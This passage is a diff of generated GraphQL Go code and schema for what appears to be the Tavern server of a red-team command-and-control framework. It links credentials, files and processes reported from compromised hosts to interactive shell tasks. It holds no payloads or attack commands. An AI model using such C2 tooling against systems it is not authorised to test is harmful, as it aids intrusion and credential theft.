"lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "input", "inputNEQ", "inputIn", "inputNotIn", "inputGT", "inputGTE", "inputLT", "inputLTE", "inputContains", "inputHasPrefix", "inputHasSuffix", "inputEqualFold", "inputContainsFold", "output", "outputNEQ", "outputIn", "outputNotIn", "outputGT", "outputGTE", "outputLT", "outputLTE", "outputContains", "outputHasPrefix", "outputHasSuffix", "outputIsNil", "outputNotNil", "outputEqualFold", "outputContainsFold", "error", "errorNEQ", "errorIn", "errorNotIn", "errorGT", "errorGTE", "errorLT", "errorLTE", "errorContains", "errorHasPrefix", "errorHasSuffix", "errorIsNil", "errorNotNil", "errorEqualFold", "errorContainsFold", "streamID", "streamIDNEQ", "streamIDIn", "streamIDNotIn", "streamIDGT", "streamIDGTE", "streamIDLT", "streamIDLTE", "streamIDContains", "streamIDHasPrefix", "streamIDHasSuffix", "streamIDEqualFold", "streamIDContainsFold", "sequenceID", "sequenceIDNEQ", "sequenceIDIn", "sequenceIDNotIn", "sequenceIDGT", "sequenceIDGTE", "sequenceIDLT", "sequenceIDLTE", "claimedAt", "claimedAtNEQ", "claimedAtIn", "claimedAtNotIn", "claimedAtGT", "claimedAtGTE", "claimedAtLT", "claimedAtLTE", "claimedAtIsNil", "claimedAtNotNil", "execStartedAt", "execStartedAtNEQ", "execStartedAtIn", "execStartedAtNotIn", "execStartedAtGT", "execStartedAtGTE", "execStartedAtLT", "execStartedAtLTE", "execStartedAtIsNil", "execStartedAtNotNil", "execFinishedAt", "execFinishedAtNEQ", "execFinishedAtIn", "execFinishedAtNotIn", "execFinishedAtGT", "execFinishedAtGTE", "execFinishedAtLT", "execFinishedAtLTE", "execFinishedAtIsNil", "execFinishedAtNotNil", "hasShell", "hasShellWith", "hasCreator", "hasCreatorWith", "hasReportedCredentials", "hasReportedCredentialsWith", "hasReportedFiles", "hasReportedFilesWith", "hasReportedProcesses", "hasReportedProcessesWith"} for _, k := range fieldsInOrder { v, ok := asMap[k] if !ok { @@ -22921,6 +23336,48 @@ func (ec *executionContext) unmarshalInputShellTaskWhereInput(ctx context.Contex return it, err } it.HasCreatorWith = data + case "hasReportedCredentials": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasReportedCredentials")) + data, err := ec.unmarshalOBoolean2ᚖbool(ctx, v) + if err != nil { + return it, err + } + it.HasReportedCredentials = data + case "hasReportedCredentialsWith": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasReportedCredentialsWith")) + data, err := ec.unmarshalOHostCredentialWhereInput2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostCredentialWhereInputᚄ(ctx, v) + if err != nil { + return it, err + } + it.HasReportedCredentialsWith = data + case "hasReportedFiles": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasReportedFiles")) + data, err := ec.unmarshalOBoolean2ᚖbool(ctx, v) + if err != nil { + return it, err + } + it.HasReportedFiles = data + case "hasReportedFilesWith": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasReportedFilesWith")) + data, err := ec.unmarshalOHostFileWhereInput2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostFileWhereInputᚄ(ctx, v) + if err != nil { + return it, err + } + it.HasReportedFilesWith = data + case "hasReportedProcesses": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasReportedProcesses")) + data, err := ec.unmarshalOBoolean2ᚖbool(ctx, v) + if err != nil { + return it, err + } + it.HasReportedProcesses = data + case "hasReportedProcessesWith": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasReportedProcessesWith")) + data, err := ec.unmarshalOHostProcessWhereInput2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostProcessWhereInputᚄ(ctx, v) + if err != nil { + return it, err + } + it.HasReportedProcessesWith = data } } @@ -27715,6 +28172,39 @@ func (ec *executionContext) _HostCredential(ctx context.Context, sel ast.Selecti continue } + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) + case "shellTask": + field := field + + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + } + }() + res = ec._HostCredential_shellTask(ctx, field, obj) + return res + } + + if field.Deferrable != nil { + dfs, ok := deferred[field.Deferrable.Label] + di := 0 + if ok { + dfs.AddField(field) + di = len(dfs.Values) - 1 + } else { + dfs = graphql.NewFieldSet([]graphql.CollectedField{field}) + deferred[field.Deferrable.Label] = dfs + } + dfs.Concurrently(di, func(ctx context.Context) graphql.Marshaler { + return innerFunc(ctx, dfs) + }) + + // don't run the out.Concurrently() call below + out.Values[i] = graphql.Null + continue + } + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) default: panic("unknown field " + strconv.Quote(field.Name)) @@ -27950,16 +28440,13 @@ func (ec *executionContext) _HostFile(ctx context.Context, sel ast.SelectionSet, case "task": field := field - innerFunc := func(ctx context.Context, fs *graphql.FieldSet) (res graphql.Marshaler) { + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { defer func() { if r := recover(); r != nil { ec.Error(ctx, ec.Recover(ctx, r)) } }() res = ec._HostFile_task(ctx, field, obj) - if res == graphql.Null { - atomic.AddUint32(&fs.Invalids, 1) - } return res } @@ -27983,21 +28470,54 @@ func (ec *executionContext) _HostFile(ctx context.Context, sel ast.SelectionSet, } out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) - default: - panic("unknown field " + strconv.Quote(field.Name)) - } - } - out.Dispatch(ctx) - if out.Invalids > 0 { - return graphql.Null - } - - atomic.AddInt32(&ec.deferred, int32(len(deferred))) + case "shellTask": + field := field - for label, dfs := range deferred { - ec.processDeferredGroup(graphql.DeferredGroup{ - Label: label, - Path: graphql.GetPath(ctx), + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + } + }() + res = ec._HostFile_shellTask(ctx, field, obj) + return res + } + + if field.Deferrable != nil { + dfs, ok := deferred[field.Deferrable.Label] + di := 0 + if ok { + dfs.AddField(field) + di = len(dfs.Values) - 1 + } else { + dfs = graphql.NewFieldSet([]graphql.CollectedField{field}) + deferred[field.Deferrable.Label] = dfs + } + dfs.Concurrently(di, func(ctx context.Context) graphql.Marshaler { + return innerFunc(ctx, dfs) + }) + + // don't run the out.Concurrently() call below + out.Values[i] = graphql.Null + continue + } + + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) + default: + panic("unknown field " + strconv.Quote(field.Name)) + } + } + out.Dispatch(ctx) + if out.Invalids > 0 { + return graphql.Null + } + + atomic.AddInt32(&ec.deferred, int32(len(deferred))) + + for label, dfs := range deferred { + ec.processDeferredGroup(graphql.DeferredGroup{ + Label: label, + Path: graphql.GetPath(ctx), FieldSet: dfs, Context: ctx, }) @@ -28191,16 +28711,46 @@ func (ec *executionContext) _HostProcess(ctx context.Context, sel ast.SelectionS case "task": field := field - innerFunc := func(ctx context.Context, fs *graphql.FieldSet) (res graphql.Marshaler) { + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { defer func() { if r := recover(); r != nil { ec.Error(ctx, ec.Recover(ctx, r)) } }() res = ec._HostProcess_task(ctx, field, obj) - if res == graphql.Null { - atomic.AddUint32(&fs.Invalids, 1) + return res + } + + if field.Deferrable != nil { + dfs, ok := deferred[field.Deferrable.Label] + di := 0 + if ok { + dfs.AddField(field) + di = len(dfs.Values) - 1 + } else { + dfs = graphql.NewFieldSet([]graphql.CollectedField{field}) + deferred[field.Deferrable.Label] = dfs } + dfs.Concurrently(di, func(ctx context.Context) graphql.Marshaler { + return innerFunc(ctx, dfs) + }) + + // don't run the out.Concurrently() call below + out.Values[i] = graphql.Null + continue + } + + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) + case "shellTask": + field := field + + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + } + }() + res = ec._HostProcess_shellTask(ctx, field, obj) return res } @@ -30288,6 +30838,105 @@ func (ec *executionContext) _ShellTask(ctx context.Context, sel ast.SelectionSet continue } + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) + case "reportedCredentials": + field := field + + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + } + }() + res = ec._ShellTask_reportedCredentials(ctx, field, obj) + return res + } + + if field.Deferrable != nil { + dfs, ok := deferred[field.Deferrable.Label] + di := 0 + if ok { + dfs.AddField(field) + di = len(dfs.Values) - 1 + } else { + dfs = graphql.NewFieldSet([]graphql.CollectedField{field}) + deferred[field.Deferrable.Label] = dfs + } + dfs.Concurrently(di, func(ctx context.Context) graphql.Marshaler { + return innerFunc(ctx, dfs) + }) + + // don't run the out.Concurrently() call below + out.Values[i] = graphql.Null + continue + } + + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) + case "reportedFiles": + field := field + + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + } + }() + res = ec._ShellTask_reportedFiles(ctx, field, obj) + return res + } + + if field.Deferrable != nil { + dfs, ok := deferred[field.Deferrable.Label] + di := 0 + if ok { + dfs.AddField(field) + di = len(dfs.Values) - 1 + } else { + dfs = graphql.NewFieldSet([]graphql.CollectedField{field}) + deferred[field.Deferrable.Label] = dfs + } + dfs.Concurrently(di, func(ctx context.Context) graphql.Marshaler { + return innerFunc(ctx, dfs) + }) + + // don't run the out.Concurrently() call below + out.Values[i] = graphql.Null + continue + } + + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) + case "reportedProcesses": + field := field + + innerFunc := func(ctx context.Context, _ *graphql.FieldSet) (res graphql.Marshaler) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + } + }() + res = ec._ShellTask_reportedProcesses(ctx, field, obj) + return res + } + + if field.Deferrable != nil { + dfs, ok := deferred[field.Deferrable.Label] + di := 0 + if ok { + dfs.AddField(field) + di = len(dfs.Values) - 1 + } else { + dfs = graphql.NewFieldSet([]graphql.CollectedField{field}) + deferred[field.Deferrable.Label] = dfs + } + dfs.Concurrently(di, func(ctx context.Context) graphql.Marshaler { + return innerFunc(ctx, dfs) + }) + + // don't run the out.Concurrently() call below + out.Values[i] = graphql.Null + continue + } + out.Concurrently(i, func(ctx context.Context) graphql.Marshaler { return innerFunc(ctx, out) }) default: panic("unknown field " + strconv.Quote(field.Name)) @@ -31847,6 +32496,16 @@ func (ec *executionContext) unmarshalNHostCredentialWhereInput2ᚖrealmᚗpubᚋ return &res, graphql.ErrorOnPath(ctx, err) } +func (ec *executionContext) marshalNHostFile2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostFile(ctx context.Context, sel ast.SelectionSet, v *ent.HostFile) graphql.Marshaler { + if v == nil { + if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) { + graphql.AddErrorf(ctx, "the requested element is null which the schema does not allow") + } + return graphql.Null + } + return ec._HostFile(ctx, sel, v) +} + func (ec *executionContext) marshalNHostFileConnection2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostFileConnection(ctx context.Context, sel ast.SelectionSet, v *ent.HostFileConnection) graphql.Marshaler { if v == nil { if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) { @@ -31973,6 +32632,16 @@ func (ec *executionContext) marshalNHostPlatform2ᚕrealmᚗpubᚋtavernᚋinter return ret } +func (ec *executionContext) marshalNHostProcess2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostProcess(ctx context.Context, sel ast.SelectionSet, v *ent.HostProcess) graphql.Marshaler { + if v == nil { + if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) { + graphql.AddErrorf(ctx, "the requested element is null which the schema does not allow") + } + return graphql.Null + } + return ec._HostProcess(ctx, sel, v) +} + func (ec *executionContext) marshalNHostProcessConnection2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostProcessConnection(ctx context.Context, sel ast.SelectionSet, v *ent.HostProcessConnection) graphql.Marshaler { if v == nil { if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) { @@ -33223,6 +33892,53 @@ func (ec *executionContext) marshalOHost2ᚖrealmᚗpubᚋtavernᚋinternalᚋen return ec._Host(ctx, sel, v) } +func (ec *executionContext) marshalOHostCredential2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostCredentialᚄ(ctx context.Context, sel ast.SelectionSet, v []*ent.HostCredential) graphql.Marshaler { + if v == nil { + return graphql.Null + } + ret := make(graphql.Array, len(v)) + var wg sync.WaitGroup + isLen1 := len(v) == 1 + if !isLen1 { + wg.Add(len(v)) + } + for i := range v { + i := i + fc := &graphql.FieldContext{ + Index: &i, + Result: &v[i], + } + ctx := graphql.WithFieldContext(ctx, fc) + f := func(i int) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + ret = nil + } + }() + if !isLen1 { + defer wg.Done() + } + ret[i] = ec.marshalNHostCredential2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostCredential(ctx, sel, v[i]) + } + if isLen1 { + f(i) + } else { + go f(i) + } + + } + wg.Wait() + + for _, e := range ret { + if e == graphql.Null { + return graphql.Null + } + } + + return ret +} + func (ec *executionContext) marshalOHostCredential2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostCredential(ctx context.Context, sel ast.SelectionSet, v *ent.HostCredential) graphql.Marshaler { if v == nil { return graphql.Null @@ -33451,6 +34167,53 @@ func (ec *executionContext) marshalOHostEdge2ᚖrealmᚗpubᚋtavernᚋinternal return ec._HostEdge(ctx, sel, v) } +func (ec *executionContext) marshalOHostFile2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostFileᚄ(ctx context.Context, sel ast.SelectionSet, v []*ent.HostFile) graphql.Marshaler { + if v == nil { + return graphql.Null + } + ret := make(graphql.Array, len(v)) + var wg sync.WaitGroup + isLen1 := len(v) == 1 + if !isLen1 { + wg.Add(len(v)) + } + for i := range v { + i := i + fc := &graphql.FieldContext{ + Index: &i, + Result: &v[i], + } + ctx := graphql.WithFieldContext(ctx, fc) + f := func(i int) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + ret = nil + } + }() + if !isLen1 { + defer wg.Done() + } + ret[i] = ec.marshalNHostFile2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostFile(ctx, sel, v[i]) + } + if isLen1 { + f(i) + } else { + go f(i) + } + + } + wg.Wait() + + for _, e := range ret { + if e == graphql.Null { + return graphql.Null + } + } + + return ret +} + func (ec *executionContext) marshalOHostFile2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostFile(ctx context.Context, sel ast.SelectionSet, v *ent.HostFile) graphql.Marshaler { if v == nil { return graphql.Null @@ -33649,6 +34412,53 @@ func (ec *executionContext) marshalOHostPlatform2ᚖrealmᚗpubᚋtavernᚋinter return v } +func (ec *executionContext) marshalOHostProcess2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostProcessᚄ(ctx context.Context, sel ast.SelectionSet, v []*ent.HostProcess) graphql.Marshaler { + if v == nil { + return graphql.Null + } + ret := make(graphql.Array, len(v)) + var wg sync.WaitGroup + isLen1 := len(v) == 1 + if !isLen1 { + wg.Add(len(v)) + } + for i := range v { + i := i + fc := &graphql.FieldContext{ + Index: &i, + Result: &v[i], + } + ctx := graphql.WithFieldContext(ctx, fc) + f := func(i int) { + defer func() { + if r := recover(); r != nil { + ec.Error(ctx, ec.Recover(ctx, r)) + ret = nil + } + }() + if !isLen1 { + defer wg.Done() + } + ret[i] = ec.marshalNHostProcess2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostProcess(ctx, sel, v[i]) + } + if isLen1 { + f(i) + } else { + go f(i) + } + + } + wg.Wait() + + for _, e := range ret { + if e == graphql.Null { + return graphql.Null + } + } + + return ret +} + func (ec *executionContext) marshalOHostProcess2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostProcess(ctx context.Context, sel ast.SelectionSet, v *ent.HostProcess) graphql.Marshaler { if v == nil { return graphql.Null diff --git a/tavern/internal/graphql/generated/mutation.generated.go b/tavern/internal/graphql/generated/mutation.generated.go index 3a2b58df6..9cc9a8b83 100644 --- a/tavern/internal/graphql/generated/mutation.generated.go +++ b/tavern/internal/graphql/generated/mutation.generated.go @@ -1367,6 +1367,8 @@ func (ec *executionContext) fieldContext_Mutation_createCredential(ctx context.C return ec.fieldContext_HostCredential_host(ctx, field) case "task": return ec.fieldContext_HostCredential_task(ctx, field) + case "shellTask": + return ec.fieldContext_HostCredential_shellTask(ctx, field) } return nil, fmt.Errorf("no field named %q was found under type HostCredential", field.Name) }, diff --git a/tavern/internal/graphql/generated/root_.generated.go b/tavern/internal/graphql/generated/root_.generated.go index 1067cb8c0..95e947379 100644 --- a/tavern/internal/graphql/generated/root_.generated.go +++ b/tavern/internal/graphql/generated/root_.generated.go @@ -191,6 +191,7 @@ type ComplexityRoot struct { LastModifiedAt func(childComplexity int) int Principal func(childComplexity int) int Secret func(childComplexity int) int + ShellTask func(childComplexity int) int Task func(childComplexity int) int } @@ -220,6 +221,7 @@ type ComplexityRoot struct { Owner func(childComplexity int) int Path func(childComplexity int) int Permissions func(childComplexity int) int + ShellTask func(childComplexity int) int Size func(childComplexity int) int Task func(childComplexity int) int } @@ -248,6 +250,7 @@ type ComplexityRoot struct { Pid func(childComplexity int) int Ppid func(childComplexity int) int Principal func(childComplexity int) int + ShellTask func(childComplexity int) int Status func(childComplexity int) int Task func(childComplexity int) int } @@ -435,19 +438,22 @@ type ComplexityRoot struct { } ShellTask struct { - ClaimedAt func(childComplexity int) int - CreatedAt func(childComplexity int) int - Creator func(childComplexity int) int - Error func(childComplexity int) int - ExecFinishedAt func(childComplexity int) int - ExecStartedAt func(childComplexity int) int - ID func(childComplexity int) int - Input func(childComplexity int) int - LastModifiedAt func(childComplexity int) int - Output func(childComplexity int) int - SequenceID func(childComplexity int) int - Shell func(childComplexity int) int - StreamID func(childComplexity int) int + ClaimedAt func(childComplexity int) int + CreatedAt func(childComplexity int) int + Creator func(childComplexity int) int + Error func(childComplexity int) int + ExecFinishedAt func(childComplexity int) int + ExecStartedAt func(childComplexity int) int + ID func(childComplexity int) int + Input func(childComplexity int) int + LastModifiedAt func(childComplexity int) int + Output func(childComplexity int) int + ReportedCredentials func(childComplexity int) int + ReportedFiles func(childComplexity int) int + ReportedProcesses func(childComplexity int) int + SequenceID func(childComplexity int) int + Shell func(childComplexity int) int + StreamID func(childComplexity int) int } ShellTaskConnection struct { @@ -1323,6 +1329,13 @@ func (e *executableSchema) Complexity(ctx context.Context, typeName, field strin return e.complexity.HostCredential.Secret(childComplexity), true + case "HostCredential.shellTask": + if e.complexity.HostCredential.ShellTask == nil { + break + } + + return e.complexity.HostCredential.ShellTask(childComplexity), true + case "HostCredential.task": if e.complexity.HostCredential.Task == nil { break @@ -1442,6 +1455,13 @@ func (e *executableSchema) Complexity(ctx context.Context, typeName, field strin return e.complexity.HostFile.Permissions(childComplexity), true + case "HostFile.shellTask": + if e.complexity.HostFile.ShellTask == nil { + break + } + + return e.complexity.HostFile.ShellTask(childComplexity), true + case "HostFile.size": if e.complexity.HostFile.Size == nil { break @@ -1575,6 +1595,13 @@ func (e *executableSchema) Complexity(ctx context.Context, typeName, field strin return e.complexity.HostProcess.Principal(childComplexity), true + case "HostProcess.shellTask": + if e.complexity.HostProcess.ShellTask == nil { + break + } + + return e.complexity.HostProcess.ShellTask(childComplexity), true + case "HostProcess.status": if e.complexity.HostProcess.Status == nil { break @@ -2687,6 +2714,27 @@ func (e *executableSchema) Complexity(ctx context.Context, typeName, field strin return e.complexity.ShellTask.Output(childComplexity), true + case "ShellTask.reportedCredentials": + if e.complexity.ShellTask.ReportedCredentials == nil { + break + } + + return e.complexity.ShellTask.ReportedCredentials(childComplexity), true + + case "ShellTask.reportedFiles": + if e.complexity.ShellTask.ReportedFiles == nil { + break + } + + return e.complexity.ShellTask.ReportedFiles(childComplexity), true + + case "ShellTask.reportedProcesses": + if e.complexity.ShellTask.ReportedProcesses == nil { + break + } + + return e.complexity.ShellTask.ReportedProcesses(childComplexity), true + case "ShellTask.sequenceID": if e.complexity.ShellTask.SequenceID == nil { break @@ -4581,6 +4629,7 @@ input CreateHostCredentialInput { kind: HostCredentialKind! hostID: ID! taskID: ID + shellTaskID: ID } """ CreateLinkInput is used for create Link object. @@ -4946,6 +4995,10 @@ type HostCredential implements Node { Task that reported this credential. """ task: Task + """ + Shell Task that reported this credential. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -5097,6 +5150,11 @@ input HostCredentialWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ An edge in a connection. @@ -5152,7 +5210,11 @@ type HostFile implements Node { """ Task that reported this file. """ - task: Task! + task: Task + """ + Shell Task that reported this file. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -5356,6 +5418,11 @@ input HostFileWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ Ordering options for Host connections @@ -5442,7 +5509,11 @@ type HostProcess implements Node { """ Task that reported this process. """ - task: Task! + task: Task + """ + Shell Task that reported this process. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -5700,6 +5771,11 @@ input HostProcessWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ HostWhereInput is used for filtering Host objects. @@ -6965,6 +7041,18 @@ type ShellTask implements Node { The user who created this ShellTask """ creator: User! + """ + Credentials reported by this shell task + """ + reportedCredentials: [HostCredential!] + """ + Files reported by this shell task + """ + reportedFiles: [HostFile!] + """ + Processes reported by this shell task + """ + reportedProcesses: [HostProcess!] } """ A connection to a list of items. @@ -7188,6 +7276,21 @@ input ShellTaskWhereInput { """ hasCreator: Boolean hasCreatorWith: [UserWhereInput!] + """ + reported_credentials edge predicates + """ + hasReportedCredentials: Boolean + hasReportedCredentialsWith: [HostCredentialWhereInput!] + """ + reported_files edge predicates + """ + hasReportedFiles: Boolean + hasReportedFilesWith: [HostFileWhereInput!] + """ + reported_processes edge predicates + """ + hasReportedProcesses: Boolean + hasReportedProcessesWith: [HostProcessWhereInput!] } """ ShellWhereInput is used for filtering Shell objects. diff --git a/tavern/internal/graphql/schema.graphql b/tavern/internal/graphql/schema.graphql index 432734f96..a9d3a42d4 100644 --- a/tavern/internal/graphql/schema.graphql +++ b/tavern/internal/graphql/schema.graphql @@ -1189,6 +1189,7 @@ input CreateHostCredentialInput { kind: HostCredentialKind! hostID: ID! taskID: ID + shellTaskID: ID } """ CreateLinkInput is used for create Link object. @@ -1554,6 +1555,10 @@ type HostCredential implements Node { Task that reported this credential. """ task: Task + """ + Shell Task that reported this credential. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -1705,6 +1710,11 @@ input HostCredentialWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ An edge in a connection. @@ -1760,7 +1770,11 @@ type HostFile implements Node { """ Task that reported this file. """ - task: Task! + task: Task + """ + Shell Task that reported this file. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -1964,6 +1978,11 @@ input HostFileWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ Ordering options for Host connections @@ -2050,7 +2069,11 @@ type HostProcess implements Node { """ Task that reported this process. """ - task: Task! + task: Task + """ + Shell Task that reported this process. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -2308,6 +2331,11 @@ input HostProcessWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ HostWhereInput is used for filtering Host objects. @@ -3573,6 +3601,18 @@ type ShellTask implements Node { The user who created this ShellTask """ creator: User! + """ + Credentials reported by this shell task + """ + reportedCredentials: [HostCredential!] + """ + Files reported by this shell task + """ + reportedFiles: [HostFile!] + """ + Processes reported by this shell task + """ + reportedProcesses: [HostProcess!] } """ A connection to a list of items. @@ -3796,6 +3836,21 @@ input ShellTaskWhereInput { """ hasCreator: Boolean hasCreatorWith: [UserWhereInput!] + """ + reported_credentials edge predicates + """ + hasReportedCredentials: Boolean + hasReportedCredentialsWith: [HostCredentialWhereInput!] + """ + reported_files edge predicates + """ + hasReportedFiles: Boolean + hasReportedFilesWith: [HostFileWhereInput!] + """ + reported_processes edge predicates + """ + hasReportedProcesses: Boolean + hasReportedProcessesWith: [HostProcessWhereInput!] } """ ShellWhereInput is used for filtering Shell objects. diff --git a/tavern/internal/graphql/schema/ent.graphql b/tavern/internal/graphql/schema/ent.graphql index f73f1145b..2fc2314bf 100644 --- a/tavern/internal/graphql/schema/ent.graphql +++ b/tavern/internal/graphql/schema/ent.graphql @@ -1184,6 +1184,7 @@ input CreateHostCredentialInput { kind: HostCredentialKind! hostID: ID! taskID: ID + shellTaskID: ID } """ CreateLinkInput is used for create Link object. @@ -1549,6 +1550,10 @@ type HostCredential implements Node { Task that reported this credential. """ task: Task + """ + Shell Task that reported this credential. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -1700,6 +1705,11 @@ input HostCredentialWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ An edge in a connection. @@ -1755,7 +1765,11 @@ type HostFile implements Node { """ Task that reported this file. """ - task: Task! + task: Task + """ + Shell Task that reported this file. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -1959,6 +1973,11 @@ input HostFileWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ Ordering options for Host connections @@ -2045,7 +2064,11 @@ type HostProcess implements Node { """ Task that reported this process. """ - task: Task! + task: Task + """ + Shell Task that reported this process. + """ + shellTask: ShellTask } """ A connection to a list of items. @@ -2303,6 +2326,11 @@ input HostProcessWhereInput { """ hasTask: Boolean hasTaskWith: [TaskWhereInput!] + """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] } """ HostWhereInput is used for filtering Host objects. @@ -2728,7 +2756,11 @@ type Portal implements Node { """ Task that created the portal """ - task: Task! + task: Task + """ + ShellTask that created the portal + """ + shellTask: ShellTask """ Beacon that created the portal """ @@ -2880,6 +2912,11 @@ input PortalWhereInput { hasTask: Boolean hasTaskWith: [TaskWhereInput!] """ + shell_task edge predicates + """ + hasShellTask: Boolean + hasShellTaskWith: [ShellTaskWhereInput!] + """ beacon edge predicates """ hasBeacon: Boolean @@ -3568,6 +3605,18 @@ type ShellTask implements Node { The user who created this ShellTask """ creator: User! + """ + Credentials reported by this shell task + """ + reportedCredentials: [HostCredential!] + """ + Files reported by this shell task + """ + reportedFiles: [HostFile!] + """ + Processes reported by this shell task + """ + reportedProcesses: [HostProcess!] } """ A connection to a list of items. @@ -3791,6 +3840,21 @@ input ShellTaskWhereInput { """ hasCreator: Boolean hasCreatorWith: [UserWhereInput!] + """ + reported_credentials edge predicates + """ + hasReportedCredentials: Boolean + hasReportedCredentialsWith: [HostCredentialWhereInput!] + """ + reported_files edge predicates + """ + hasReportedFiles: Boolean + hasReportedFilesWith: [HostFileWhereInput!] + """ + reported_processes edge predicates + """ + hasReportedProcesses: Boolean + hasReportedProcessesWith: [HostProcessWhereInput!] } """ ShellWhereInput is used for filtering Shell objects. diff --git a/tavern/internal/http/shell/integration_test.go b/tavern/internal/http/shell/integration_test.go index b00908ec5..544e46dee 100644 --- a/tavern/internal/http/shell/integration_test.go +++ b/tavern/internal/http/shell/integration_test.go @@ -152,7 +152,7 @@ func TestInteractiveShell(t *testing.T) { // 1. Create Portal (Agent side) using mux.CreatePortal // This will create the Portal entity AND setup the topics. // It returns portalID, teardown, err - portalID, agentCleanup, err := env.Mux.CreatePortal(ctx, env.EntClient, env.Task.ID) + portalID, agentCleanup, err := env.Mux.CreatePortal(ctx, env.EntClient, env.Task.ID, 0) require.NoError(t, err) defer agentCleanup() @@ -344,7 +344,7 @@ func TestOtherStreamOutput(t *testing.T) { ctx := context.Background() // 1. Create Portal - portalID, agentCleanup, err := env.Mux.CreatePortal(ctx, env.EntClient, env.Task.ID) + portalID, agentCleanup, err := env.Mux.CreatePortal(ctx, env.EntClient, env.Task.ID, 0) require.NoError(t, err) defer agentCleanup() diff --git 